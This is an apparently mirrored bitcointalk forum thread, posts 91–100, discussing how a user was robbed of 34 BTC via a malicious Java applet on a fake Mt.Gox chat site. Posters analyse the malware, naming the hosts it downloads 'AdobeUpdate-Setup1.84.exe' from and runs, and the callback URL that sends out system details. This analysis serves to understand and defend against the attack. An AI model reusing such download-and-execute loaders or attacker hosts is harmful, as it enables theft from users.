Live data from Hacker News

How I got robbed of 34 btc on Mt.Gox today

bitcointalk.org

91–100 of 251 posts

Re: How I got robbed of 34 btc on Mt.Gox today

#91

So, how about if you could have a Linux boot image onna stick, properly secured, no Java, several BitCoin apps preinstalled and optimized to boot extremely quickly into what would basically be a sort of BitCoin Wallet dashboard interface. You could plug in the USB, hibernate, flip the switch and be Bitcoin banking within seconds. Then unhibernate and get on with whatever you were doing on your day-to-day OS. That way…

The biggest issue I see would be updating the block chain for the wallet between uses. Seems like it takes longer and longer to update. Moved my wallet to a new computer last night and it's been going for the last 5 hours.

If you download the blockchain from the P2P wallet client it always takes forever. You should download the blockchain once, put it on a USB drive, and then copy it into .bitcoin before you bootstrap a new machine with a wallet.

There are also sites that offer downloads of tar'd versions of the blockchain, or torrents. Pretty much anything is going to be faster than downloading via a bitcoin client.

Re: How I got robbed of 34 btc on Mt.Gox today

#92

Earlier quoted context omitted.

Ah, that explains why it could get away with "Runtime.getRuntime().exec(str9);". Now, the thing is, I don't think the forum user mentioned clicking anything. However, it's possible they've stolen the signature from something else, which that person has previously chosen to "Always Accept"? (I don't know if Java lets you do that)

Since I don't have an mtgox account, and I have a fair degree of confidence that the code posted can't possibly escape the Java sandbox, I decided to live dangerously and try loading the page. Here's the warning screen that comes up when you load it: http://i.imgur.com/sXDoFLt.png Note the self-signed certificate from "North Sumatra". Gotta say, I have no sympathy for someone who clicks through that warning screen an…

Usually these exploit kits will use useragent and the reported plugins to decide what versions of the page to send. If this is a pro job if you were running an exploitable version of java (which a majority of people tend to be) it would push an applet that used an exploit to load its stage 2. But if it decides it doesn't have an exploit for you it takes a different approach like scareware or prompt to run etc.

Re: How I got robbed of 34 btc on Mt.Gox today

#93
post #87

Earlier quoted context omitted.

but it'd be viral so be universal. Merchents and absolutely everyone would all quickly start checking just to ensure they don't get coins they can't trade, making it effectively universal. Which means it comes down to convincing the gatekeeper that you were burgled. But that's a human level problem.

and whoever that controlled that list would basically control bitcoins, because they could charge a levy or else they'd put your bitcoin into that list.

Yup, way to put a centralized control on your decentralized "currency."

Re: How I got robbed of 34 btc on Mt.Gox today

#94
Is funny that people throw around words like "java script 0 day exploit" and then post:

>Then and there someone posted a link to www mtgox-chat info (do not open unless you know what >you are doing) claiming a video announcement that mtgox was going to start trading litecoins. >I clicked on the link, the website opened, not much happened, and the "video"/chatbox never loaded. >I then forgot about this website.

Re: How I got robbed of 34 btc on Mt.Gox today

#95
post #86

Earlier quoted context omitted.

Oh come on, how hard is it for MtGox to implement TOTP and tell users to download Google Authenticator? It's not really that much hassle to enter a code each time you want to make a transaction, and these things wouldn't happen. Sure, the user was being stupid here, but MtGox didn't do them any favors either.

"Oh come on, how hard is it for MtGox to implement TOTP and tell users to download Google Authenticator?" Not hard, and they did it a long time ago. The user didn't opt in.

Hum, really? I didn't notice it in the settings, and I'm sure I would have. I'll look again, thank you.

Re: How I got robbed of 34 btc on Mt.Gox today

#96
post #25

Earlier quoted context omitted.

It sends log messages to http://www.galaxyjdb.com with your OS information and the state of the app.. /insert.php?o=*os.name*&u=*APPDATA*&ip=java.io.tmpdir&e=*APPSTATE* It appears to download an exe from http://g2f.nl/0lczsoo Then it tries to execute the exe: System.getenv("APPDATA") + "\\AdobeUpdate-Setup1.84.exe"; If at any point in the process it hits an exception, it sends the code for that exception to the galax…

Ooh, galaxyjdb has a register page: http://www.galaxyjdb.com/index.php?a=Register >Paypal E-Mail: >Hackforums Profile Link: That means this is a service for script kiddies, they've sold this exploit as a service. EDIT: Hackforums is basically a public internet forum where people openly discuss "hacking" and sell "hacking" tools. I've seen another example, a DDOS service, with an almost empty homepage but login and re…

What did you redact there?

Re: How I got robbed of 34 btc on Mt.Gox today

#97

From the source of mtgox-chat.info: Yep, probably an exploit, there aren't many good reasons for a 10x10 applet. Let's download the jar. It contains a single 3.5KB payload. Let's use a Java decompiler (JD-GUI). import java.applet.Applet; import java.applet.AppletContext; import java.io.BufferedInputStream; import java.io.BufferedOutputStream; import java.io.FileNotFoundException; import java.io.FileOutputStream; impo…

The applet itself is pretty straightforward: it downloads the real payload, called "AdobeUpdate-Setup1.84.exe", from g2f.nl/0lczsoo and then runs it. By default, applets don't have permission to access the local filesystem or start processes, but this one has a digital signature which means the user is prompted to give it elevated permissions.

How did that executable transfer his bitcoins?

Re: How I got robbed of 34 btc on Mt.Gox today

#99

Earlier quoted context omitted.

I think that is a bit extreme. I'd suggest rather than not installing Java at all just to not install/disable the browser addons that allow java applets to execute. This way the only way you are going to be executing anything Java is by downloading the .jar (or a executable wrapper) and running it. To me if you have to download the .jar and run it then that is no different to downloading an executable and running it…

How is it extreme? The only time I've needed java is for minecraft. Luckily I'm not rocking windows so the chance of being hit by a 0-day is a bit lower (correct me if I'm wrong.) But stopping the chance of having everything in your digital (and in the case of money, personal) life stolen because you clicked on a link FAR outweighs the benefit of playing minecraft imo.

Eclipse, Netbeans, IDEA, SoapUI, HermesJMS, Notes, SQLDeveloper, DB2 viewer. Chances are, if you're developing software you're going to use Java at some point

Re: How I got robbed of 34 btc on Mt.Gox today

#100
post #80

Mtgox has clearly not had time to respond, and I fear they will claim this is my fault as I have seen in other posts online that they say "report it to the police". They should compensate me 100%. This shows one of the fundamental problems with Bitcoin-related services: when people get taken advantage of, they expect to be compensated. While in the real world, banks will often compensate you if you're the victim of f…

but bitcoins are like a digital cash - people don't expect to be compensated when their cash get burgled (at least, not by a bank).

In this analogy, his cash was held by the bank. He can say someone impersonated him to send it. But unfortunately he did not take advantage of two factor authentication and he got phished.

Actually from reading more, i don't understand if MtGox is involved at all. Did the executable just steal the wallet.dat file from his hard drive and have nothing to do with MtGox?

Post reply on HN